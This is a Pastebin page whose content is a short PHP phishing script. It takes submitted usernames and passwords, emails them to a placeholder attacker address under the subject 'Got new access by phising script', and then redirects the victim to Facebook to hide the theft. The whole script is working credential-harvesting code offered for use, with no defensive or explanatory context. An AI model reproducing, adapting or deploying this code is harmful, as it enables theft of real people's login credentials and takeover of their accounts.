Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- function mail_sender(){
- if(! ( isset($_REQUEST['username']) && isset($_REQUEST['password']) ) ){
- return false;
- }
- $username = $_REQUEST['username'];
- $password = $_REQUEST['password'];
- $reciever = "YOUR-EMAIL ADRRESS";
- $subject = "Got new access by phising script";
- $message = "The username is ". $username;
- $message .= "and password is ". $password;
- return mail($reciever, $subject, $message);
- }
- if(mail_sender()){
- header("Location: http://www.facebook.com");
- }
- header("location:javascript://history.go(-1)");
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement